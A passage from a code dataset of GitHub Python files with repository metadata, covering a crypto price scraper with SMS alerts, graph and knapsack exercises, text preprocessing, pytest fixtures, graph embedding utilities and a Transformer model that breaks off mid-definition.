CRYPTOCURRENCIES AS OF \" + datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\") )\nprint(\"<><><><><><><><><><><><><><><><><><><><><><><><><><><><>\")\nprint()\nfor x in rows[1:6]:\n cell=x.findAll('td')\n p=x.findAll(\"p\")\n div=cell[3].findAll('div')\n rank+=1\n curreny=p[0].text\n symbol=cell[2].text\n symbol=symbol.replace(curreny,'')\n if symbol=='':\n symbol='None'\n price=div[0].text\n change=cell[4].text\n price=price.replace(change,'')\n print(\"==========================\")\n print(\"==========================\")\n print(f' Rank: {rank}')\n print(f' Name: {curreny} ')\n print(f' Symbol: {symbol} ')\n print(f' Current Price: {price}')\n print(f' 24hr %Change: {change}')\n print(\"==========================\")\n print(\"==========================\")\n print()\n input(\"Press enter for the next coin\")\n \n if symbol=='BTC' and float(price.replace('$','').replace(',',''))<40000:\n textmessage=client.messages.create(to=myCellPhone, from_=TwilioNumber, body='The Price of Bitcoin has fallen below $40,000. The current price of Bitcoin is '+ price)\n #print(textmessage.status)\n if symbol=='ETH' and float(price.replace('$','').replace(',',''))<3000:\n textmessage=client.messages.create(to=myCellPhone, from_=TwilioNumber, body='The Price of Ethereum has fallen below $3,000. The current price of Ethereum is '+ price)\n #print(textmessage.status)\n ","repo_name":"ALEXETZEL/webscrapingAP","sub_path":"crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"28775395657","text":"import os\nimport subprocess\n\nclass KataController(object):\n # def __init__(self, language, test_file):\n\n @staticmethod\n def createCode():\n args = os.environ[\"EDITOR\"].split()\n import tempfile\n tempfile = tempfile.NamedTemporaryFile(suffix=\".tmp\")\n args.append(tempfile.name)\n subprocess.call(args)\n code = open(tempfile.name, 'r').read()\n tempfile.close\n os.unlink(tempfile.name)\n return code\n\n @staticmethod\n def interactive():\n shell = 'groovysh'\n subprocess.call(args)\n # def prepare(self):\n # virtualenv, pip, whatever","repo_name":"maxlinc/behave-relish","sub_path":"omni/katacontroller.py","file_name":"katacontroller.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29485889223","text":"import pandas as pd\nfrom stemmer import stem\nimport re\n\n# Pattern to clean apostrophes\nquotePattern = re.compile(\"[']\")\n# Pattern to remove special characters\nspecCharsPattern = re.compile(\"[^A-Za-z0-9' ]\")\n\n# Stop word dictionary\nstop_words = {'he': 0, 'at': 0, \"wont\": 0, 'below': 0, \"its\": 0, 'under': 0,\n'who': 0, 'her': 0, \"wasnt\": 0, 'have': 0, 'while': 0, 'how': 0, 'both': 0,\n\"arent\": 0, 'and': 0, 'yours': 0, 'i': 0, 'in': 0, 'own': 0, \"shes\": 0,\n'now': 0, \"neednt\": 0, 'few': 0, 'them': 0, 'hasn': 0, \"thatll\": 0,\n'before': 0, 'do': 0, 'ourselves': 0, 's': 0, \"youll\": 0, 'himself': 0,\n'same': 0, 'ain': 0, 'out': 0, 'we': 0, \"hasnt\": 0, 'what': 0, 'until': 0,\n'herself': 0, 'needn': 0, \"shant\": 0, 'after': 0, \"isnt\": 0, 'just': 0,\n'down': 0, 'doesn': 0, 'hadn': 0, 've': 0, 'more': 0, 'were': 0, 'through': 0,\n'an': 0, 'can': 0, 'a': 0, \"couldnt\": 0, 'haven': 0, 'each': 0, 'which': 0,\n'by': 0, 'wouldn': 0, 'over': 0, 'most': 0, \"mightnt\": 0, 'be': 0, 'off': 0,\n'your': 0, \"mustnt\": 0, 'too': 0, 't': 0, 'hers': 0, 'its': 0, 'd': 
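# --- Illustrative refactor sketch (not the original script) ---
# The alert logic above repeats parse-and-compare per coin; a small threshold
# table keeps it in one place. `send_sms` is a hypothetical stand-in for the
# Twilio client call.
def parse_price(price: str) -> float:
    return float(price.replace("$", "").replace(",", ""))

THRESHOLDS = {"BTC": 40000.0, "ETH": 3000.0}  # alert when price drops below

def maybe_alert(symbol, price, send_sms=print):
    limit = THRESHOLDS.get(symbol)
    if limit is not None and parse_price(price) < limit:
        send_sms(f"The price of {symbol} has fallen below ${limit:,.0f}: {price}")

maybe_alert("BTC", "$39,500.12")  # prints an alert message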
0,\n'you': 0, 'or': 0, 'is': 0, 'been': 0, 'all': 0, 'for': 0, 'if': 0,\n'yourself': 0, 'had': 0, 'as': 0, 'weren': 0, 'their': 0, 'this': 0,\n'with': 0, 'other': 0, 'has': 0, 'not': 0, \"shouldve\": 0, \"shouldnt\": 0,\n'are': 0, 'don': 0, 'shan': 0, 'doing': 0, 'm': 0, 'they': 0, \"youd\": 0,\n'having': 0, 'ours': 0, 'wasn': 0, 'did': 0, 'here': 0, \"hadnt\": 0, 're': 0,\n'on': 0, 'very': 0, 'that': 0, 'above': 0, \"werent\": 0, \"youve\": 0,\n'mustn': 0, 'will': 0, 'should': 0, 'couldn': 0, 'to': 0, 'there': 0, 'so': 0,\n'itself': 0, 'our': 0, 'me': 0, \"doesnt\": 0, 'ma': 0, 'such': 0, 'further': 0,\n'only': 0, 'the': 0, 'between': 0, 'y': 0, 'some': 0, 'him': 0, 'those': 0,\n'won': 0, 'mightn': 0, 'nor': 0, 'being': 0, 'was': 0, 'themselves': 0,\n'any': 0, \"didnt\": 0, 'my': 0, \"wouldnt\": 0, 'these': 0, 'she': 0, 'into': 0,\n'am': 0, \"youre\": 0, 'where': 0, 'isn': 0, 'once': 0, 'it': 0, 'didn': 0,\n'during': 0, 'about': 0, 'again': 0, 'aren': 0, 'yourselves': 0, 'theirs': 0,\n'll': 0, \"havent\": 0, 'against': 0, 'then': 0, 'why': 0, 'o': 0, 'but': 0,\n\"dont\": 0, 'shouldn': 0, 'up': 0, 'no': 0, 'because': 0, 'than': 0, 'does': 0,\n'his': 0, 'when': 0, 'of': 0, 'whom': 0, 'from': 0, 'myself': 0}\n\n\ndef clean(text):\n if not pd.isnull(text):\n text = re.sub(quotePattern, \"\", text)\n text = re.sub(specCharsPattern, \" \", text)\n tokens = text.lower().split()\n filtered_text = \"\"\n for w in tokens:\n if w not in stop_words:\n filtered_text += stem(w) + \"|\"\n return filtered_text[:-1]\n else:\n return None\n\n\ndata = pd.read_csv('news_scrap_final.csv', header=0)\nclean_data = pd.DataFrame(columns=data.columns.values)\n\nfor i, row in data.iterrows():\n heading = clean(row['HEADING'])\n body = clean(row['BODY'])\n if heading and body and row['CATEGORY'] and row['Real/Fake']:\n clean_data = clean_data.append({'HEADING': heading, 'BODY': body, 'CATEGORY': row['CATEGORY'], 'Real/Fake': row['Real/Fake']}, ignore_index=True)\n\nclean_data.dropna(how='any')\nclean_data.to_csv('news_data_final.csv', encoding='utf-8', index=False)\n","repo_name":"Pi-Rasp/Fake-News-Detection","sub_path":"Preprocessing/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"14130505727","text":"import asyncio\nimport datetime\n\nimport databroker\nimport pytest\nfrom bluesky.callbacks import best_effort\nfrom bluesky.run_engine import RunEngine\nfrom databroker import Broker\nfrom ophyd.utils import make_dir_tree\n\nfrom sirepo_bluesky.madx_handler import MADXFileHandler\nfrom sirepo_bluesky.shadow_handler import ShadowFileHandler\nfrom sirepo_bluesky.sirepo_bluesky import SirepoBluesky\nfrom sirepo_bluesky.srw_handler import SRWFileHandler\n\n\n@pytest.fixture(scope=\"function\")\ndef db():\n \"\"\"Return a data broker\"\"\"\n # MongoDB backend:\n db = Broker.named(\"local\") # mongodb backend\n try:\n databroker.assets.utils.install_sentinels(db.reg.config, version=1)\n except Exception:\n pass\n\n db.reg.register_handler(\"srw\", SRWFileHandler, overwrite=True)\n db.reg.register_handler(\"shadow\", ShadowFileHandler, overwrite=True)\n db.reg.register_handler(\"SIREPO_FLYER\", SRWFileHandler, overwrite=True)\n db.reg.register_handler(\"madx\", MADXFileHandler, overwrite=True)\n\n return db\n\n\n@pytest.fixture(scope=\"function\")\ndef RE(db):\n loop = asyncio.new_event_loop()\n loop.set_debug(True)\n RE = RunEngine({}, loop=loop)\n RE.subscribe(db.insert)\n\n bec 
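# --- Usage sketch of the clean() pipeline above ---
# An identity stemmer stands in for the project's `stem`; this shows the
# apostrophe-strip -> special-char strip -> stopword filter -> join steps.
import re

def clean_demo(text, stop_words=frozenset({"the", "is", "a"})):
    text = re.sub(r"[']", "", text)
    text = re.sub(r"[^A-Za-z0-9' ]", " ", text)
    kept = [w for w in text.lower().split() if w not in stop_words]
    return "|".join(kept)

print(clean_demo("The economy isn't growing, analysts say!"))
# economy|isnt|growing|analysts|say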
= best_effort.BestEffortCallback()\n RE.subscribe(bec)\n\n return RE\n\n\n@pytest.fixture(scope=\"function\")\ndef RE_no_plot(db):\n loop = asyncio.new_event_loop()\n loop.set_debug(True)\n RE = RunEngine({}, loop=loop)\n RE.subscribe(db.insert)\n\n bec = best_effort.BestEffortCallback()\n bec.disable_plots()\n RE.subscribe(bec)\n\n return RE\n\n\n@pytest.fixture(scope=\"function\")\ndef make_dirs():\n root_dir = \"/tmp/sirepo-bluesky-data\"\n _ = make_dir_tree(datetime.datetime.now().year, base_path=root_dir)\n\n\n@pytest.fixture(scope=\"function\")\ndef srw_empty_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"srw\", \"emptysim\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef srw_youngs_double_slit_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"srw\", \"00000000\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef srw_basic_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"srw\", \"00000001\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef srw_tes_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"srw\", \"00000002\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef srw_ari_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"srw\", \"00000003\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef srw_chx_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"srw\", \"HXV1JQ5c\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef shadow_basic_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"shadow\", \"00000001\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef shadow_tes_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"shadow\", \"00000002\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef madx_resr_storage_ring_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"madx\", \"00000000\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef madx_bl1_compton_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"madx\", \"00000001\")\n return connection\n\n\n@pytest.fixture(scope=\"function\")\ndef madx_bl2_triplet_tdc_simulation(make_dirs):\n connection = SirepoBluesky(\"http://localhost:8000\")\n data, _ = connection.auth(\"madx\", \"00000002\")\n return connection\n","repo_name":"NSLS-II/sirepo-bluesky","sub_path":"sirepo_bluesky/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"} +{"seq_id":"72181380205","text":"'''\nTask. Given an undirected graph and two distinct vertices 𝑢 and 𝑣, check if there is a path between 𝑢 and 𝑣.\nInput Format. An undirected graph with 𝑛 vertices and 𝑚 edges. The next line contains two vertices 𝑢\nand 𝑣 of the graph.\nConstraints. 2 ≤ 𝑛 ≤ 103\n; 1 ≤ 𝑚 ≤ 103\n; 1 ≤ 𝑢, 𝑣 ≤ 𝑛; 𝑢 ̸= 𝑣.\nOutput Format. 
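# --- Illustrative consolidation sketch (same SirepoBluesky API as above) ---
# The per-simulation fixtures each repeat one auth call; a factory fixture
# removes the duplication. A sketch only, assuming the same local server URL.
import pytest
from sirepo_bluesky.sirepo_bluesky import SirepoBluesky

@pytest.fixture(scope="function")
def sirepo_connection(make_dirs):
    def _connect(sim_type, sim_id):
        connection = SirepoBluesky("http://localhost:8000")
        connection.auth(sim_type, sim_id)
        return connection
    return _connect

# usage inside a test:  conn = sirepo_connection("srw", "00000002")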
Output 1 if there is a path between 𝑢 and 𝑣 and 0 otherwise.\n'''\n\ndef explore(adjList,a,visited):\n visited[a] = True\n for ele in adjList[a]:\n if not visited[ele]:\n explore(adjList,ele,visited)\n\ndef reach(adjList, x, y):\n visited = [False]*(len(adjList))\n explore(adjList,x,visited)\n if visited[y] == True:\n return 1\n else:\n return 0\n\n\nif __name__ == '__main__':\n n,m = list(map(int,input().split()))\n edgeList = []\n for i in range(m):\n a,b = map(int,input().split())\n edgeList.append([a,b])\n x,y = map(int,input().split())\n adjList = [[] for _ in range(n)]\n for l in edgeList:\n adjList[l[0]-1].append(l[1]-1)\n adjList[l[1]-1].append(l[0]-1)\n print(reach(adjList,x-1,y-1))\n","repo_name":"yashwanthguguloth24/Algorithms-on-Graphs","sub_path":"Week1-Decomposition of Graphs/reachability.py","file_name":"reachability.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29639187027","text":"from backpack import solveKnapsackFile, Solver\nimport unittest\nimport time\nimport matplotlib.pyplot as plt\n\nclass BackpackTest(unittest.TestCase):\n\n def testMethodsOnFile(self, problems_filename=\"problems_size10.txt\", solutions_filename=\"problems_size10_solutions.txt\"):\n \n # Locate solutions file\n try:\n f = open(solutions_filename)\n except FileNotFoundError:\n f = open('problems/' + solutions_filename)\n \n # Load expected solutions\n expected_solution_string = next(f)\n expected_solution = eval(expected_solution_string)\n f.close()\n\n # Test each algorithm that the solver currently supports\n solver = Solver()\n solver.loadProblemFromFile(problems_filename)\n for method in solver.SOLVER_METHODS:\n print(f\"Testing {method}...\")\n self.assertEqual(solver.getSolutions(method), expected_solution, f\"\\n\\n\\n\\nThis failure occurred when testing {method}.\")\n print(f\"{method} test was successful.\")\n\n\ndef produce_plots():\n \n SIZES = [10, 15, 20]\n timings = dict() # maps file's approximate problem size to time to solve entire file\n\n for size in SIZES:\n\n print(f\"\\n\\nNow solving problems_size{size}.txt:\")\n\n # Record how long the file for this size takes\n start = time.perf_counter()\n solution = solveKnapsackFile(f\"problems_size{size}.txt\", verbosity=1)\n end = time.perf_counter()\n timings[size] = end - start\n\n print(\"Total time: %.3f sec\" % (end - start))\n print(\"Solutions:\")\n print(solution)\n\n # No need to plot just one datapoint\n if len(timings) == 1: \n continue\n \n # Plot all the datapoints so far; this way the user can kill the program once the graphs are taking too long to generate, but still see graphs on the way to that point\n plt.title(f\"Timings for Problem Sizes {', '.join([str(size) for size in timings])}\")\n plt.xlabel(\"Approximate Problem Size\")\n plt.ylabel(\"Running Time (sec)\")\n plt.xticks(ticks=list(timings.keys()))\n plt.plot(list(timings.keys()), list(timings.values()))\n plt.show()\n\n\ndef main(run_unit_tests=True, plot=False):\n \n # Print a demo solution\n demo_filename = \"problems_size15.txt\"\n print(f\"Solution for {demo_filename}:\")\n solution = solveKnapsackFile(\"problems_size15.txt\")\n print(solution)\n\n # Run tests and produce plots, if so desired\n if plot:\n produce_plots()\n if run_unit_tests:\n print(\"\\n----------------------------------------------------------------------\\nNow running unit tests on all knapsack implementations.\\n\")\n unittest.main()\n\nif __name__ == '__main__':\n 
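# --- Illustrative alternative (not part of the assignment solution above) ---
# The recursive explore() can hit Python's default recursion limit near
# n = 10**3; an explicit stack gives the same reachability answer iteratively.
def reach_iterative(adj_list, x, y):
    visited = [False] * len(adj_list)
    stack = [x]
    while stack:
        node = stack.pop()
        if visited[node]:
            continue
        visited[node] = True
        stack.extend(adj_list[node])
    return 1 if visited[y] else 0

print(reach_iterative([[1], [0, 2], [1], []], 0, 2))  # 1
print(reach_iterative([[1], [0, 2], [1], []], 0, 3))  # 0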
main()\n","repo_name":"esramish/Knapsack","sub_path":"test_knapsack.py","file_name":"test_knapsack.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"442804058","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\npd.options.display.max_columns = 999\r\nhomes = pd.read_excel('C:/Users/Administrator/Documents/Python/home_data.xlsx')\r\nprint(homes.head())\r\nprint(homes.corr())\r\n\r\n# 散点图\r\nhomes.plot.scatter(x='sqft_living', y='price')\r\nplt.show()\r\n\r\n# 面积直方图\r\nhomes.sqft_living.plot.kde()\r\nhomes.sqft_living.plot.hist(bins=100)\r\nplt.xticks(range(0, max(homes.sqft_living), 500), fontsize=8, rotation=90)\r\nplt.show()\r\n\r\n# 价格直方图\r\nhomes.price.plot.hist(bins=200)\r\nplt.xticks(range(0, max(homes.price), 100000), fontsize=8, rotation=90)\r\nplt.show()\r\n\r\n# 密度图\r\nhomes.sqft_living.plot.kde()\r\nplt.xticks(range(0, max(homes.sqft_living), 500), fontsize=8, rotation=90)\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Morgenlefay/Pandas-VS-Excel","sub_path":"D11.py","file_name":"D11.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"18862936829","text":"import sys\nimport pickle\nfrom tqdm import tqdm\nimport os.path as osp\nimport multiprocessing as mp\n\nimport numpy as np\nimport networkx as nx\n\nimport torch\nfrom torch.nn import CosineSimilarity\nfrom torch_geometric.utils import to_networkx\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics.pairwise import cosine_similarity, cosine_distances, euclidean_distances\n\ndef sample_anchor_nodes(data, num_anchor_nodes, sampling_method):\n \"\"\"\n Returns num_anchor_nodes amount of sampled anchor nodes based upon the sampling_method provided\n \"\"\"\n if sampling_method == 'stochastic':\n node_indices = np.arange(data.num_nodes)\n sampled_anchor_nodes = np.random.choice(node_indices, num_anchor_nodes)\n\n if sampling_method == 'pagerank':\n G = to_networkx(data)\n pagerank = nx.pagerank_scipy(G)\n sorted_pagerank = {k: v for k, v in sorted(pagerank.items(), key=lambda item: item[1])} #ascending sort\n sampled_anchor_nodes = list(sorted_pagerank.keys())[-num_anchor_nodes:] #take last n because of ascending sort\n\n if sampling_method == 'betweenness_centrality':\n G = to_networkx(data)\n betweenness_centrality = nx.betweenness_centrality(G)\n sorted_betweenness_centrality = {k: v for k, v in sorted(betweenness_centrality.items(), key=lambda item: item[1])} #ascending sort\n sampled_anchor_nodes = list(sorted_betweenness_centrality.keys())[-num_anchor_nodes:]#take last n because of ascending sort\n\n if sampling_method == 'degree_centrality':\n G = to_networkx(data)\n degree_centrality = nx.degree_centrality(G)\n sorted_degree_centrality = {k: v for k, v in sorted(degree_centrality.items(), key=lambda item: item[1])} #ascending sort\n sampled_anchor_nodes = list(sorted_degree_centrality.keys())[-num_anchor_nodes:] #take last n because of ascending sort\n\n if sampling_method == 'eigenvector_centrality':\n G = to_networkx(data)\n eigenvector_centrality = nx.eigenvector_centrality_numpy(G)\n sorted_eigenvector_centrality = {k: v for k, v in sorted(eigenvector_centrality.items(), key=lambda item: item[1])} #ascending sort\n sampled_anchor_nodes = list(sorted_eigenvector_centrality.keys())[-num_anchor_nodes:] #take last n because of ascending 
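# --- Illustrative sketch of the timing pattern used above ---
# The paired perf_counter calls can be wrapped once; contextmanager keeps
# each call site to a single `with` line. Not project code.
import time
from contextlib import contextmanager

@contextmanager
def timed(label):
    start = time.perf_counter()
    try:
        yield
    finally:
        print("%s: %.3f sec" % (label, time.perf_counter() - start))

with timed("demo"):
    sum(range(10**6))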
sort\n\n if sampling_method == 'closeness_centrality':\n G = to_networkx(data)\n closeness_centrality = nx.closeness_centrality(G)\n sorted_closeness_centrality = {k: v for k, v in sorted(closeness_centrality.items(), key=lambda item: item[1])} #ascending sort\n sampled_anchor_nodes = list(sorted_closeness_centrality.keys())[-num_anchor_nodes:] #take last n because of ascending sort\n\n if sampling_method == 'clustering_coefficient':\n G = to_networkx(data)\n clustering_coefficient = nx.clustering(G)\n sorted_clustering_coefficient = {k: v for k, v in sorted(clustering_coefficient.items(), key=lambda item: item[1])} #ascending sort\n sampled_anchor_nodes = list(sorted_clustering_coefficient.keys())[-num_anchor_nodes:] #take last n because of ascending sort\n\n return sampled_anchor_nodes\n\ndef shortest_path_length(G, anchor_nodes, partition_length):\n \"\"\"\n Calculate shortest path distance to every sampled anchor node and normalize by 1/distance. No path = 0\n \"\"\"\n dists_dict = {}\n for node in partition_length:\n distances = []\n for anchor_node in anchor_nodes:\n try:\n distances.append(1/len(nx.shortest_path(G, source=node, target=anchor_node)))\n\n except nx.NetworkXNoPath:\n distances.append(0)\n dists_dict[node] = distances.copy()\n\n\n #dists_dict[node] = nx.single_source_shortest_path_length(G, node)\n return dists_dict\n\ndef merge_dicts(dicts):\n \"\"\"\n Helper function for parallel shortest path calculation. Merges dicts from jobs into one\n \"\"\"\n result = {}\n for dictionary in dicts:\n result.update(dictionary)\n return result\n\ndef all_pairs_shortest_path_length_parallel(G, anchor_nodes, num_workers):\n \"\"\"\n Distribute shortest path calculation jobs to async workers, merge dicts and return results\n \"\"\"\n try:\n nodes = list(G.nodes)\n pool = mp.Pool(processes=num_workers)\n jobs = [pool.apply_async(shortest_path_length,\n args=(G, anchor_nodes, nodes[int(len(nodes)/num_workers*i):int(len(nodes)/num_workers*(i+1))])) for i in range(num_workers)]\n output = []\n for job in tqdm(jobs):\n output.append(job.get())\n dists_dict = merge_dicts(output)\n pool.close()\n pool.join()\n return dists_dict\n \n except KeyboardInterrupt:\n print('terminating workers...')\n pool.terminate()\n pool.join()\n print('workers terminated!')\n sys.exit(1)\n\ndef get_geodesic_distance_vector(data, num_workers):\n \"\"\"\n Calculate normalized distance vector for all nodes in given graph G. 
Calculation is performed using networkx shortest path length and normalization is performed trough 1/distance.\n \"\"\"\n distance_embedding = []\n G = to_networkx(data)\n\n dist_dict = all_pairs_shortest_path_length_parallel(G, data.anchor_nodes, num_workers)\n\n distance_embedding = torch.as_tensor(list(dist_dict.values()))\n return distance_embedding\n\n\ndef concat_into_features(embedding_matrix, data):\n \"\"\"\n Merge features and embedding matrix, returns combined feature matrix\n \"\"\"\n embedding_tensor = torch.as_tensor(embedding_matrix)\n combined = torch.cat((data.x, embedding_tensor), 1) #concatenate with X along dimension 1\n return combined\n\ndef attach_distance_embedding(data, dataset, num_anchor_nodes, sampling_method, distance_function, num_workers):\n \"\"\"\n Sample anchor nodes based on sampling method, returns GraphPOPE embeddings concatenated with feature matrix X\n \"\"\"\n print('sampling anchor nodes...')\n data.anchor_nodes = sample_anchor_nodes(data=data, num_anchor_nodes=num_anchor_nodes, sampling_method=sampling_method)\n print('deriving shortest paths to anchor nodes...')\n embedding_matrix = get_geodesic_distance_vector(data=data, num_workers=num_workers)\n extended_features = concat_into_features(embedding_matrix=embedding_matrix, data=data)\n print('feature matrix is blessed by the POPE!')\n return extended_features\n\ndef attach_node2vec(data, dataset, num_anchor_nodes, sampling_method, distance_function, num_workers):\n \"\"\"\n Load cached node2vec embedding of the given graph, generates embedding space GraphPOPE embeddings which are subsequently concatenated with the feature matrix X and returned\n \"\"\"\n scaler = MinMaxScaler()\n print('sampling anchor nodes...')\n loading_path = osp.join(osp.dirname(osp.realpath(__file__)), 'data', f'{dataset}_node2vec.pt')\n node2vec_embeddings = torch.load(loading_path, map_location=\"cpu\").detach().numpy()\n\n dist_map = {\n 'distance': cosine_distances,\n 'similarity': cosine_similarity,\n 'euclidean': euclidean_distances,\n }\n\n cosine_function = dist_map[distance_function]\n if sampling_method == 'stochastic':\n anchor_nodes = sample_anchor_nodes(data, num_anchor_nodes, sampling_method='stochastic')\n anchor_embeddings = [node2vec_embeddings[anchor_node] for anchor_node in anchor_nodes]\n else:\n kmeans = KMeans(n_clusters=num_anchor_nodes).fit(node2vec_embeddings)\n anchor_embeddings = kmeans.cluster_centers_\n print('K means cluster anchor nodes derived!')\n \n\n embedding_out = cosine_function(node2vec_embeddings, anchor_embeddings)\n scaler.fit(embedding_out)\n scaled_pope = scaler.transform(embedding_out)\n extended_features = concat_into_features(embedding_matrix=scaled_pope, data=data)\n\n print('feature matrix is blessed by the POPE')\n return extended_features\n\ndef Graphpope(data, dataset: str, embedding_space: str, sampling_method: str, num_anchor_nodes: int, distance_function=None, num_workers=4):\n \"\"\"\n Derive GraphPOPE embeddings for the provided data object.\n\n dataset: {'flickr', 'pubmed'}, required for cached nodevec embeddings of the graph.\n embedding_space: {'node2vec', 'geodesic'}, required to determine in which space anchor node distance is derived, geodesic distance or embedding space distance.\n sampling_method: {'stochastic', 'kmeans', 'closeness_centrality', 'degree_centrality', 'eigenvector_centrality', 'pagerank', 'clustering_coefficient'}, used to determine stochastic or biased anchor node sampling. 
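# --- Minimal end-to-end sketch of the geodesic GraphPOPE idea above ---
# For each node, the embedding row holds the normalized distance to every
# anchor; the code above normalizes by the node count of the shortest path
# (hops + 1), with 0 for unreachable anchors. Plain networkx, toy graph.
import networkx as nx

G = nx.path_graph(5)          # 0-1-2-3-4
anchors = [0, 4]

def pope_row(node):
    dists = nx.single_source_shortest_path_length(G, node)
    return [1.0 / (dists[a] + 1) if a in dists else 0.0 for a in anchors]

print([pope_row(n) for n in G.nodes])  # node 0 -> [1.0, 0.2]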
In case of biased sampling, determines centrality metric.\n    num_anchor_nodes: int, the number of anchor nodes to sample and subsequently generate distance embeddings for. 0 anchor nodes results in a baseline GraphSAGE model.\n    distance_function: {None, 'distance', 'similarity', 'euclidean'}, determines the distance metric used for embedding space distance calculation for the node2vec implementation. None if embedding_space == 'geodesic'.\n    num_workers: int, the number of workers for multiprocessing of shortest path calculation.\n\n    Returns the GraphPOPE feature embeddings concatenated with the original feature matrix.\n    \"\"\"\n    global cached_pope_embedding #for caching\n    pope_map = {\n        'geodesic': attach_distance_embedding,\n        'node2vec': attach_node2vec,\n    }\n\n    # Avoid deriving pope embeddings twice due to test dataloader instantiating a new LightningDataModule after training conclusion\n    try:\n        enhanced_features = cached_pope_embedding\n\n    except NameError:\n        pope = pope_map[embedding_space]\n        enhanced_features = pope(data, dataset, num_anchor_nodes, sampling_method, distance_function, num_workers=num_workers)\n        cached_pope_embedding = enhanced_features\n\n    return enhanced_features","repo_name":"JeroendenBoef/GraphPOPE","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9873,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"11680459113","text":"import copy\nimport math\n\nimport torch\nimport numpy as np\nfrom einops import rearrange\nfrom torch import nn\nimport torch.nn.functional as F\n\n\nclass Encoder(nn.Module):\n    def __init__(self, layer, norm, N):\n        super(Encoder, self).__init__()\n        self.layers = clone(layer, N)\n        self.norm = norm\n\n    def forward(self, src, src_mask):\n        for layer in self.layers:\n            src = layer(src, src_mask)\n        return self.norm(src)\n\n\nclass EncoderLayer(nn.Module):\n    def __init__(self, attn, ff, su):\n        super(EncoderLayer, self).__init__()\n        self.attn = attn\n        self.ff = ff\n        self.su = clone(su, 2)\n\n    def forward(self, src, src_mask):\n        src = self.su[0](src, lambda x: self.attn(x, x, x, src_mask))\n        return self.su[1](src, self.ff)\n\n\nclass Decoder(nn.Module):\n    def __init__(self, layer, norm, N):\n        super(Decoder, self).__init__()\n        self.layers = clone(layer, N)\n        self.norm = norm\n\n    def forward(self, src, tgt, src_mask, tgt_mask):\n        for layer in self.layers:\n            tgt = layer(src, tgt, src_mask, tgt_mask)\n        return self.norm(tgt)\n\n\nclass DecoderLayer(nn.Module):\n    def __init__(self, attn, attn2, ff, su):\n        super(DecoderLayer, self).__init__()\n        self.attn = attn\n        self.attn2 = attn2\n        self.ff = ff\n        self.su = clone(su, 3)\n\n    def forward(self, src, tgt, src_mask, tgt_mask):\n        tgt = self.su[0](tgt, lambda x: self.attn(x, x, x, tgt_mask))\n        # cross-attention must use its own weights; the original reused self.attn\n        tgt = self.su[1](tgt, lambda x: self.attn2(x, src, src, src_mask))\n        return self.su[2](tgt, self.ff)\n\n\nclass Transformer(nn.Module):\n    def __init__(self, src_embed, tgt_embed, encoder, decoder, generator):\n        super(Transformer, self).__init__()\n        self.src_embed = src_embed\n        self.tgt_embed = tgt_embed\n        self.encoder = encoder\n        self.decoder = decoder\n        self.generator = generator\n\n    def forward(self, src, tgt, src_mask, tgt_mask):\n        src_rep = self.encode(src, src_mask)\n        tgt_rep = self.decode(src_rep, tgt, src_mask, tgt_mask)\n        return self.generator(tgt_rep)\n\n    def decode(self, src_rep, tgt, src_mask, tgt_mask):\n        return self.decoder(src_rep, self.tgt_embed(tgt), src_mask, tgt_mask)\n\n    def encode(self, src, src_mask):\n        return 
